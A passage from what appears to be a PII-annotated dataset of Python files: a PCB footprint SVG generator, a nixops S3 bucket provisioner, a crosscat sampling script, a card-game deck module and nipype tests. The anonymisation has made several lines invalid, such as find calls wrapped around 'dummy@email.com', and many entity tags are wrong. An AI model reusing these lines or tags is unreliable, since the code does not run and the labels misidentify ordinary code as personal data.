'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""') + + circle.set('cx', '{}'.format(hole['pos'][0]*self.mmpx)) + circle.set('cy', '{}'.format(hole['pos'][1]*self.mmpx)) + circle.set('r', '{}'.format(hole['d']/2*self.mmpx)) + + + def gen_pac_line(self, line): + + layer = self.svg.find(dummy@email.com(line['layer'])) + + if(line['layer'] == 'Courtyard'): + color = '#e63a81' + elif(line['layer'] == 'Silk'): + color = '#111111' + else: + color = '#000000' + + el = ET.SubElement(layer, 'path') + el.set('style', 'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none'.format(line['width'], color=color)) + + pathdata = '' + first = True + + for (x,y) in line['vertices']: + if(first): + pathdata += 'M ' + '{},{}'.format(x*self.mmpx,y*self.mmpx) + first = False + elif(x == 'end'): + pathdata += ' z' + else: + pathdata += ' L ' + '{},{}'.format(x*self.mmpx,y*self.mmpx) + + el.set('d', pathdata) + + + def gen_circle(self, layer_name, diameter, pos): + + layer = self.svg.find(dummy@email.com(layer_name)) + + if(layer_name == 'Courtyard'): + color = '#e63a81' + elif(layer_name == 'Silk'): + color = '#111111' + else: + color = '#000000' + + circle = ET.SubElement(layer, 'circle') + circle.set('style', 'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""'.format(color=color)) + + circle.set('cx', '{}'.format(pos[0]*self.mmpx)) + circle.set('cy', '{}'.format(pos[1]*self.mmpx)) + circle.set('r', '{}'.format(diameter/2*self.mmpx)) + + +if(__name__ == '__main__'): + + target = get_target() + + target.output('test.svg') +",4250,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'fout'], ['LOCATION', ""package['holes""], ['PERSON', 'pos\n\t\t\t}'], ['PERSON', 'top_layer = self.svg.find(\'.//g[@id=""Top'], ['PERSON', 'TODO'], ['PERSON', ""el.set('style""], ['PERSON', ""el.set('height""], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['LOCATION', '000000'], ['PERSON', ""el.set('style""], ['NRP', '000000'], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['URL', 'xml.et'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.mm'], ['URL', 'self.sv'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'test.sv']]" +49,"# -*- coding: utf-8 -*- + +# Automatic provisioning of AWS S3 buckets. + +import time +import botocore +import boto3 +import nixops.util +import nixops.resources +import nixops.ec2_utils + + +class S3BucketDefinition(nixops.resources.ResourceDefinition): + """"""Definition of an S3 bucket."""""" + + @classmethod + def get_type(cls): + return ""s3-bucket"" + + @classmethod + def get_resource_type(cls): + return ""s3Buckets"" + + def __init__(self, xml, config={}): + nixops.resources.ResourceDefinition.__init__(self, xml, config) + self.bucket_name = xml.find(dummy@email.com(""value"") + self.region = xml.find(dummy@email.com(""value"") + self.access_key_id = xml.find(dummy@email.com(""value"") + self.policy = xml.find(dummy@email.com(""value"") + self.website_enabled = self.config[""website""][""enabled""] + self.website_suffix = self.config[""website""][""suffix""] + self.website_error_document = self.config[""website""][""errorDocument""] + + def show_type(self): + return ""{0} [{1}]"".format(self.get_type(), self.region) + + +class S3BucketState(nixops.resources.ResourceState): + """"""State of an S3 bucket."""""" + + state = nixops.util.attr_property(""state"", nixops.resources.ResourceState.MISSING, int) + bucket_name = nixops.util.attr_property(""ec2.bucketName"", None) + access_key_id = nixops.util.attr_property(""ec2.accessKeyId"", None) + region = nixops.util.attr_property(""ec2.region"", None) + + + @classmethod + def get_type(cls): + return ""s3-bucket"" + + + def __init__(self, depl, name, id): + nixops.resources.ResourceState.__init__(self, depl, name, id) + self._conn = None + + + def show_type(self): + s = super(S3BucketState, self).show_type() + if self.region: s = ""{0} [{1}]"".format(s, self.region) + return s + + + @property + def resource_id(self): + return self.bucket_name + + def get_definition_prefix(self): + return ""resources.s3Buckets."" + + def connect(self): + if self._conn: return + (access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id) + self._conn = boto3.session.Session(region_name=self.region if self.region != ""US"" else ""us-east-1"", + aws_access_key_id=access_key_id, + aws_secret_access_key=secret_access_key) + + def create(self, defn, check, allow_reboot, allow_recreate): + + self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id() + if not self.access_key_id: + raise Exception(""please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID"") + + if len(defn.bucket_name) > 63: + raise Exception(""bucket name ‘{0}’ is longer than 63 characters."".format(defn.bucket_name)) + + self.connect() + s3client = self._conn.client('s3') + if check or self.state != self.UP: + + self.log(""creating S3 bucket ‘{0}’..."".format(defn.bucket_name)) + try: + ACL = 'private' # ..or: public-read, public-read-write, authenticated-read + s3loc = region_to_s3_location(defn.region) + if s3loc == ""US"": + s3client.create_bucket(ACL = ACL, + Bucket = defn.bucket_name) + else: + s3client.create_bucket(ACL = ACL, + Bucket = defn.bucket_name, + CreateBucketConfiguration = { + 'LocationConstraint': s3loc + }) + except botocore.exceptions.ClientError as e: + if e.response['Error']['Code'] != ""BucketAlreadyOwnedByYou"": raise + + with self.depl._db: + self.state = self.UP + self.bucket_name = defn.bucket_name + self.region = defn.region + + if defn.policy: + self.log(""setting S3 bucket policy on ‘{0}’..."".format(defn.bucket_name)) + s3client.put_bucket_policy(Bucket = defn.bucket_name, + Policy = defn.policy.strip()) + else: + try: + s3client.delete_bucket_policy(Bucket = defn.bucket_name) + except botocore.exceptions.ClientError as e: + # This seems not to happen - despite docs indicating it should: + # [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html] + if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise # (204 : Bucket didn't have any policy to delete) + + if not defn.website_enabled: + try: + s3client.delete_bucket_website(Bucket = defn.bucket_name) + except botocore.exceptions.ClientError as e: + if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise + else: + website_config = { 'IndexDocument': { 'Suffix': defn.website_suffix } } + if defn.website_error_document != """": + website_config['ErrorDocument'] = { 'Key': defn.website_error_document} + s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config) + + + + def destroy(self, wipe=False): + if self.state == self.UP: + self.connect() + try: + self.log(""destroying S3 bucket ‘{0}’..."".format(self.bucket_name)) + bucket = self._conn.resource('s3').Bucket(self.bucket_name) + try: + bucket.delete() + except botocore.exceptions.ClientError as e: + if e.response['Error']['Code'] != ""BucketNotEmpty"": raise + if not self.depl.logger.confirm(""are you sure you want to destroy S3 bucket ‘{0}’?"".format(self.bucket_name)): return False + bucket.objects.all().delete() + bucket.delete() + except botocore.exceptions.ClientError as e: + if e.response['Error']['Code'] != ""NoSuchBucket"": raise + return True + + +def region_to_s3_location(region): + # S3 location names are identical to EC2 regions, except for + # us-east-1 and eu-west-1. + if region == ""eu-west-1"": return ""EU"" + elif region == ""us-east-1"": return ""US"" + else: return region +",6394,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'S3'], ['LOCATION', 'config='], ['PERSON', 'self.access_key_id = xml.find(dummy@email.com(""value'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['LOCATION', 'US'], ['LOCATION', 'defn'], ['LOCATION', 'US'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['LOCATION', 'US'], ['US_DRIVER_LICENSE', 'S3'], ['URL', 'http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]'], ['URL', 'nixops.re'], ['URL', 'nixops.ec'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.resources.Re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ac'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.util.at'], ['URL', 'ec2.ac'], ['URL', 'nixops.util.at'], ['URL', 'ec2.re'], ['URL', 'nixops.resources.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'nixops.ec'], ['URL', 'self.ac'], ['URL', 'boto3.session.Se'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.ac'], ['URL', 'defn.ac'], ['URL', 'nixops.ec'], ['URL', 'utils.ge'], ['URL', 'self.ac'], ['URL', 'self.co'], ['URL', 'conn.cl'], ['URL', 'self.st'], ['URL', 'defn.re'], ['URL', 's3client.cr'], ['URL', 's3client.cr'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.de'], ['URL', 'self.st'], ['URL', 'self.re'], ['URL', 'defn.re'], ['URL', 'defn.policy.st'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'e.re'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'conn.re'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.depl.logger.co'], ['URL', 'bucket.objects.al'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re']]" +50,"# +# Copyright (c) 2010-2014, MIT Probabilistic Computing Project +# +# Lead Developers: Dan Lovell and Jay Baxter +# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka +# Research Leads: Vikash Mansinghka, Patrick Shafto +# +# Licensed under the Apache License, Version 2.0 (the ""License""); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +import argparse +import sys +from collections import Counter +# +import numpy +import pylab +pylab.ion() +pylab.show() +# +import crosscat.tests.plot_utils as pu +import crosscat.utils.file_utils as fu +import crosscat.utils.sample_utils as su +import crosscat.utils.api_utils as au + + +# parse some arguments +parser = argparse.ArgumentParser() +parser.add_argument('pkl_name', type=str) +parser.add_argument('--inf_seed', default=0, type=int) +parser.add_argument('--hostname', default='127.0.0.1', type=str) +args = parser.parse_args() +pkl_name = args.pkl_name +inf_seed = args.inf_seed +hostname = args.hostname + +# FIXME: getting weird error on conversion to int: too large from inside pyx +def get_next_seed(max_val=32767): # sys.maxint): + return random_state.randint(max_val) + +# resume from saved name +save_dict = fu.unpickle(pkl_name) +random_state = numpy.random.RandomState(inf_seed) +M_c = save_dict['M_c'] +X_L = save_dict['X_L'] +X_D = save_dict['X_D'] + +# FIXME: test constraints +# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)] +Y = None + +# test simple_predictive_sample_observed +views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D) +views_samples = [] +for replicating_samples_params in views_replicating_samples_params: + this_view_samples = [] + for replicating_sample_params in replicating_samples_params: + this_view_this_sample = su.simple_predictive_sample( + M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params) + this_view_samples.extend(this_view_this_sample) + views_samples.append(this_view_samples) +for view_idx, view_samples in enumerate(views_samples): + data_array = numpy.array(view_samples) + pu.plot_T(data_array) + pylab.title('simple_predictive_sample observed, view %s on local' % view_idx) + +# test simple_predictive_sample_observed REMOTE +# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com' +URI = 'http://' + hostname + ':8007' +method_name = 'simple_predictive_sample' +# +views_samples = [] +for replicating_samples_params in views_replicating_samples_params: + this_view_samples = [] + for replicating_sample_params in replicating_samples_params: + args_dict = dict( + M_c=save_dict['M_c'], + X_L=save_dict['X_L'], + X_D=save_dict['X_D'], + Y=replicating_sample_params['Y'], + Q=replicating_sample_params['Q'], + n=replicating_sample_params['n'], + ) + this_view_this_sample, id = au.call( + method_name, args_dict, URI) + print id + this_view_samples.extend(this_view_this_sample) + views_samples.append(this_view_samples) +for view_idx, view_samples in enumerate(views_samples): + data_array = numpy.array(view_samples) + pu.plot_T(data_array) + pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx) + +# test simple_predictive_sample_unobserved +observed_Q = views_replicating_samples_params[0][0]['Q'] +Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q] +new_row_samples = [] +new_row_sample = su.simple_predictive_sample( + M_c, X_L, X_D, Y, Q, get_next_seed, n=1000) +new_row_samples.extend(new_row_sample) +new_row_samples = numpy.array(new_row_samples) +pu.plot_T(new_row_samples) + +# once more with constraint +Y = [(int(1E6), 0, 100)] +new_row_sample = su.simple_predictive_sample( + M_c, X_L, X_D, Y, Q, get_next_seed, n=1) + +# test impute +# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed) +",4283,"[['DATE_TIME', '2010-2014'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Baxter Eaves'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Vikash Mansinghka'], ['PERSON', 'Patrick Shafto'], ['LOCATION', 'crosscat.utils.sample_utils'], ['LOCATION', 'au'], ['PERSON', ""default='127.0.0.1""], ['PERSON', 'save_dict = fu.unpickle(pkl_name'], ['LOCATION', 'M_c'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['PERSON', 'new_row_samples'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pylab.io'], ['URL', 'pylab.sh'], ['URL', 'crosscat.tests.pl'], ['URL', 'crosscat.utils.fi'], ['URL', 'crosscat.utils.sa'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.pk'], ['URL', 'args.in'], ['URL', 'sys.ma'], ['URL', 'su.de'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'ec2-23-22-208-4.compute-1.amazonaws.com'], ['URL', 'au.ca'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'su.im']]" +51,"# -*- coding: utf-8 -*- +"""""" +.. module:: deck + :synopsis: Encapsulates the behavior of card collections +.. moduleauthor:: Zach Mitchell dummy@email.com +"""""" + +from random import shuffle +from typing import List +from .cards import ( + Card, + CardFaction, + CardEffect, + CardAction, + CardTarget +) +from .cardrepo import CardRepo +from .exceptions import ( + RealmsException, + MainDeckEmpty, + PlayerDeckEmpty, + PlayerDeckInitSize, + PlayerDeckInitContents, + UUIDNotFoundError, + HandInitError +) +from collections import Counter +from typing import NamedTuple + +CardList = List[Card] +EffectList = List[CardEffect] +FactionList = List[CardFaction] + + +EffectRecord = NamedTuple('EffectRecord', [ + ('target', CardTarget), + ('action', CardAction), + ('value', int), + ('uuid', str), + ('provider', str)]) + + +class PlayerDeck(object): + """""" + Records the state of the player's deck + + At any given point in time the player may have three piles of cards: undrawn cards, a + hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are + in which pile, provides an interface from which a hand of cards can be assembled, and + shuffles the deck when necessary. + + Parameters + ---------- + player_cards : List[Card] + The list of cards from which the player's starting deck will be constructed + + Raises + ------ + PlayerDeckInitSize + Raised when constructing the deck with the wrong number of cards + PlayerDeckInitContents + Raised when constructing the deck with cards other than Vipers and Scouts + """""" + + starting_size = 10 + + def __init__(self, player_cards: CardList): + try: + self._validate_deck_size(player_cards) + self._validate_deck_contents(player_cards) + except RealmsException: + raise + self._undrawn: CardList = player_cards + shuffle(self._undrawn) # shuffled in place + self._discards: CardList = [] + + @staticmethod + def _validate_deck_size(cards: CardList) -> None: + """"""Ensures that the starting deck contains the correct + number of cards + + Parameters + ---------- + cards : CardList + The tentative starting deck + + Raises + ------ + PlayerDeckInitSize + Raised if the tentative starting deck is not the correct size + """""" + if len(cards) != PlayerDeck.starting_size: + raise PlayerDeckInitSize(len(cards)) + return + + @staticmethod + def _validate_deck_contents(cards) -> None: + """"""Ensures that the tentative starting deck contains only Vipers and Scouts + + Parameters + ---------- + cards : CardList + The tentative starting deck + + Raises + ------ + PlayerDeckInitContents + Raised if the tentative starting deck contains cards other than Vipers or Scouts + """""" + for c in cards: + if (c.name != 'Viper') and (c.name != 'Scout'): + raise PlayerDeckInitContents(c.name) + return + + def _next_card(self) -> Card: + """"""Produces the next card from the player's deck + + Attempts to draw a card from the top of the undrawn pile. If + the undrawn pile is empty, the undrawn pile is replenished from + the discard pile and shuffled before attempting to draw a card again. + An attempt to draw a card from the undrawn pile while both the undrawn + pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception. + + Returns + ------- + Card + A card from the top of the undrawn pile + + Raises + ------ + PlayerDeckEmpty + Raised when attempting to draw a card while both undrawn and discard + piles are empty + """""" + if len(self._undrawn) > 0: + return self._undrawn.pop() + elif len(self._discards) > 0: + self._refill_undrawn() + return self._undrawn.pop() + else: + raise PlayerDeckEmpty + + @property + def cards_remaining(self) -> int: + """"""The total number of cards left in the undrawn and discard piles + + Returns + ------- + int + The number of cards left to draw from + """""" + return len(self._undrawn) + len(self._discards) + + def _refill_undrawn(self) -> None: + """"""Refills the undrawn pile with cards from the discard pile + + Note + ---- + The cards in the discard pile are shuffled before being placed + back into the undrawn pile + """""" + self._undrawn: CardList = self._discards + shuffle(self._undrawn) # shuffled in place + self._discards: CardList = [] + return + + def discard(self, card: Card) -> None: + """"""Sends the card to the discard pile + + Parameters + ---------- + card : Card + The card to send to the discard pile + """""" + self._discards.append(card) + return + + def draw(self, num=5) -> CardList: + """"""Draws the specified number of cards from the undrawn pile + + Parameters + ---------- + num : int (Optional) + The number of cards to draw (Default is 5) + + Returns + ------- + List[Card] + The list of cards that were drawn + + Raises + ------ + IndexError + Raised if no cards are left to draw, or the number of cards requested + is not a positive integer + + Note + ---- + If there are cards remaining in the deck but there are fewer cards than + were requested, then as many cards as possible are returned. + """""" + if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)): + raise IndexError + cards: CardList = [] + for _ in range(num): + try: + cards.append(self._next_card()) + except PlayerDeckEmpty: + break + return cards + + def _scrap(self, card): + """""" + Permanently removes a card from the discard pile + """""" + pass + + +class MainDeck(object): + """"""The deck from which players can acquire cards + + Parameters + ---------- + cardrepo : CardRepo + The repository from which the cards are obtained + """""" + def __init__(self, cardrepo: CardRepo): + self._repo: CardRepo = cardrepo + self._cards: CardList = self._repo.main_deck_cards() + shuffle(self._cards) + return + + def next_card(self) -> Card: + """"""Produces the next card from the main deck + + Returns + ------- + Card + A card from the top of the main deck + + Raises + ------ + MainDeckEmpty + Raised when attempting to draw a card when the deck is empty + """""" + if len(self._cards) > 0: + return self._cards.pop() + else: + raise MainDeckEmpty + + +class TradeRow(object): + """"""Presents the cards that players may acquire + + Parameters + ---------- + maindeck : MainDeck + The deck from which the trade row is drawn + cardrepo : CardRepo + The repository from which cards are obtained + """""" + def __init__(self, maindeck: MainDeck, cardrepo: CardRepo): + self._maindeck: MainDeck = maindeck + self._repo: CardRepo = cardrepo + self._explorer = None + self._cards = [] + + @property + def available(self) -> CardList: + """"""Produces the list of all cards available for purchase + + Returns + ------- + List[Card] + The list of cards available for purchase + """""" + return self.cards + [self.explorer] + + @property + def cards(self) -> CardList: + """"""Produces the list of cards available for purchase + from the main deck + + Returns + ------- + List[Card] + The list of available cards from the main deck + """""" + while len(self._cards) < 5: + try: + card: Card = self._maindeck.next_card() + except MainDeckEmpty: + break + self._cards.append(card) + return self._cards + + @property + def explorer(self) -> Card: + """"""Produces the current Explorer available for purchase + + Returns + ------- + Card + The current Explorer + """""" + if self._explorer is None: + self._explorer: Card = self._repo.new_explorer() + return self._explorer + + def acquire(self, uuid: str) -> Card: + """"""Produces the card with the specified UUID + + Parameters + ---------- + uuid : str + The UUID of the card the player wishes to acquire + + Returns + ------- + Card + The card with the specified UUID + + Raises + ------ + UUIDNotFoundError + Raised when the UUID of the requested card is not found + in the list of available cards + """""" + cards_bools = [c.uuid == uuid for c in self.cards] + if True in cards_bools: + i = cards_bools.index(True) + return self._cards.pop(i) + elif self.explorer.uuid == uuid: + card = self._explorer + self._explorer = None + return card + else: + raise UUIDNotFoundError + + def scrap(self, uuid: str) -> None: + """"""Permanently removes a card from the trade row + + Parameters + ---------- + uuid : str + The UUID of the card to remove + """""" + cards_bools = [c.uuid == uuid for c in self.cards] + if True in cards_bools: + i = cards_bools.index(True) + del self._cards[i] + elif self.explorer.uuid == uuid: + self._explorer = None + else: + raise UUIDNotFoundError + return + + +class Hand(object): + """"""The player's hand of cards + + A Hand is made from a list of cards drawn from the undrawn pile of the player's deck, + as well as any bases that were played previously and have not been destroyed. + + The processing of cards into a collection of effects is a multi-step process: + + 1. The basic effects are pulled from each card + 2. The factions are tallied up to see which cards may activate their ally abilities + 3. Ally abilities are pulled from each card + 4. The effects are aggregated by their action types + 5. Effects are applied in whatever order the user chooses + 6. If cards are drawn as the result of an action, the effects list is updated + + Parameters + ---------- + to_draw : int + The number of cards to draw initially + existing_bases : List[Card] + Any bases that were played previously and have not yet been destroyed + playerdeck : PlayerDeck + The player's deck + """""" + def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck): + if (to_draw < 0) or (to_draw > 5): + raise HandInitError + try: + drawn: CardList = playerdeck.draw(to_draw) + except IndexError: + drawn: CardList = [] + self.cards = drawn + existing_bases + self._playerdeck = playerdeck + return + + @staticmethod + def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]: + """"""Assembles a list of `EffectRecord`s from the cards in the hand + """""" + basic_effects: List[EffectRecord] = [] + for c in cards: + effects: List[CardEffect] = c.effects_basic + records = [EffectRecord(target=e.target, + action=e.action, + value=e.value, + uuid=e.uuid, + provider=c.uuid) + for e in effects] + basic_effects += records + return records + + @staticmethod + def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]: + """"""Assembles a list of factions that should have their ally abilities activated + """""" + factions: CardFaction = [c.faction for c in cards] + if CardFaction.ALL in factions: + return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE] + counts = Counter(factions) + allies: List[CardFaction] = [key for key in counts.keys() + if counts[key] > 1 and key != CardFaction.UNALIGNED] + return allies + + @staticmethod + def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]: + """"""Assembles a list of the ally effects that are applicable + """""" + ally_effects: List[EffectRecord] = [] + for c in cards: + effects: List[CardEffect] = c.effects_ally + records = [EffectRecord(target=e.target, + action=e.action, + value=e.value, + uuid=e.uuid, + provider=c.uuid) + for e in effects if c.faction in facs] + ally_effects += records + return ally_effects + + def _collect_effects(self) -> List[EffectRecord]: + """"""Assembles a list of effects provided by the player's hand + """""" + basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards) + ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards) + ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions) + return basic_effects + ally_effects +",13773,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Zach Mitchell'], ['PERSON', 'EffectRecord'], ['PERSON', 'str'], ['PERSON', 'str'], ['PERSON', 'MainDeck = maindeck'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'PlayerDeck.st'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'self.ca'], ['URL', 'repo.ma'], ['URL', 'self.ca'], ['URL', 'maindeck.ne'], ['URL', 'repo.ne'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'CardFaction.AL'], ['URL', 'CardFaction.ST'], ['URL', 'CardFaction.MA'], ['URL', 'counts.ke'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca']]" +52,"# -*- coding: utf-8 -*- +# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- +# vi: set ft=python sts=4 ts=4 sw=4 et: +from __future__ import print_function, unicode_literals +from future import standard_library +standard_library.install_aliases() + +from builtins import open, str, bytes +import os +import tempfile +import shutil +import warnings +import simplejson as json + +from nipype.testing import (assert_equal, assert_not_equal, assert_raises, + assert_true, assert_false, with_setup, package_check, + skipif, example_data) +import nipype.interfaces.base as nib +from nipype.utils.filemanip import split_filename +from nipype.interfaces.base import Undefined, config +from traits.testing.nose_tools import skip +import traits.api as traits + + +def test_bunch(): + b = nib.Bunch() + yield assert_equal, b.__dict__, {} + b = nib.Bunch(a=1, b=[2, 3]) + yield assert_equal, b.__dict__, {'a': 1, 'b': [2, 3]} + + +def test_bunch_attribute(): + b = nib.Bunch(a=1, b=[2, 3], c=None) + yield assert_equal, b.a, 1 + yield assert_equal, b.b, [2, 3] + yield assert_equal, b.c, None + + +def test_bunch_repr(): + b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2)) + yield assert_equal, repr(b), ""Bunch(a={'m': 2, 'n': 1}, b=2, c=3)"" + + +def test_bunch_methods(): + b = nib.Bunch(a=2) + b.update(a=3) + newb = b.dictcopy() + yield assert_equal, b.a, 3 + yield assert_equal, b.get('a'), 3 + yield assert_equal, b.get('badkey', 'otherthing'), 'otherthing' + yield assert_not_equal, b, newb + yield assert_equal, type(dict()), type(newb) + yield assert_equal, newb['a'], 3 + + +def test_bunch_hash(): + # NOTE: Since the path to the json file is included in the Bunch, + # the hash will be unique to each machine. + pth = os.path.split(os.path.abspath(__file__))[0] + json_pth = os.path.join(pth, 'realign_json.json') + b = nib.Bunch(infile=json_pth, + otherthing='blue', + yat=True) + newbdict, bhash = b._get_bunch_hash() + yield assert_equal, bhash, 'PI:KEY' + # Make sure the hash stored in the json file for `infile` is correct. + jshash = nib.md5() + with open(json_pth, 'r') as fp: + jshash.update(fp.read().encode('utf-8')) + yield assert_equal, newbdict['infile'][0][1], jshash.hexdigest() + yield assert_equal, newbdict['yat'], True + + +# create a temp file +# global tmp_infile, tmp_dir +# tmp_infile = None +# tmp_dir = None +def setup_file(): + # global tmp_infile, tmp_dir + tmp_dir = tempfile.mkdtemp() + tmp_infile = os.path.join(tmp_dir, 'foo.txt') + with open(tmp_infile, 'w') as fp: + fp.writelines(['123456789']) + return tmp_infile + + +def teardown_file(tmp_dir): + shutil.rmtree(tmp_dir) + + +def test_TraitedSpec(): + yield assert_true, nib.TraitedSpec().get_hashval() + yield assert_equal, nib.TraitedSpec().__repr__(), '\n\n' + + class spec(nib.TraitedSpec): + foo = nib.traits.Int + goo = nib.traits.Float(usedefault=True) + + yield assert_equal, spec().foo, Undefined + yield assert_equal, spec().goo, 0.0 + specfunc = lambda x: spec(hoo=x) + yield assert_raises, nib.traits.TraitError, specfunc, 1 + infields = spec(foo=1) + hashval = ([('foo', 1), ('goo', '0.0000000000')], 'PI:KEY') + yield assert_equal, infields.get_hashval(), hashval + # yield assert_equal, infields.hashval[1], hashval[1] + yield assert_equal, infields.__repr__(), '\nfoo = 1\ngoo = 0.0\n' + + +@skip +def test_TraitedSpec_dynamic(): + from pickle import dumps, loads + a = nib.BaseTraitedSpec() + a.add_trait('foo', nib.traits.Int) + a.foo = 1 + assign_a = 